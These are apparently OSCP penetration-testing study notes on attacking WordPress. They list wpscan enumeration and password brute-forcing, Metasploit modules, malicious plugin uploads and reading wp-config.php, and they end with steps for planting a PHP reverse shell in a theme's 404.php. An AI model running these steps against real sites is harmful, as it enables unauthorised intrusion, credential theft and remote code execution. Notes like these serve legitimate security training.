OSCP Notes



  • Brute-force http://$IP/wp-admin, http://$IP/wp-login.php
    # Extract users, version
    wpscan --url http://$IP --enumerate
    # Brute-force creds (user: admin)
    wpscan --url http://$IP --wordlist rockyou.txt --username $USERS --max-threads 3
    # Ignore the SSL cert errordisable-tls-check
    wpscan -–url https://$IP disable-tls-check
  • Metasploit
    • brute-force: msf > use auxiliary/scanner/http/wordpress_login_enum
  • Check http://$IP/wp-content/themes, http://$IP/wp-content/uploads
  • Possible attack vectors:
    • After login, upload php reverse shell in 404.php of a theme (wp-content/themes/twentynineteen/404.php)
    • msf > use exploit/unix/webapp/wp_admin_shell_upload
    • Upload malicious plugins in zip
  • Check interesting files: /var/www/wp-config.php
  • Check plugins’ vulnerability
    • WordPress Plugin User Role Editor (https://www.exploit-db.com/exploits/44595): THM-Jack

Where uploads are stored

<base URL>/wp-content/uploads/<yyyy>/<mm>/<file name>

WordPress Enumeration

wpscan --url <url> -e vt,tt,u,ap -o wpscan.log

WordPress Bruteforcing

wpscan --url <url> --wordlist <wordlist> --username <username>
Navigate to:
Appearance (left-hand side) > Editor (left-hand side) > 404 Template (right-hand side)

Spawn Shell From WP Admin Access

Replace the PHP there with malicious shell spawning PHP (e.g. pentestmonkey php reverse shell script)
Browse to http://<site_name>/wp-content/themes/<theme_name>/404.php to trigger the payload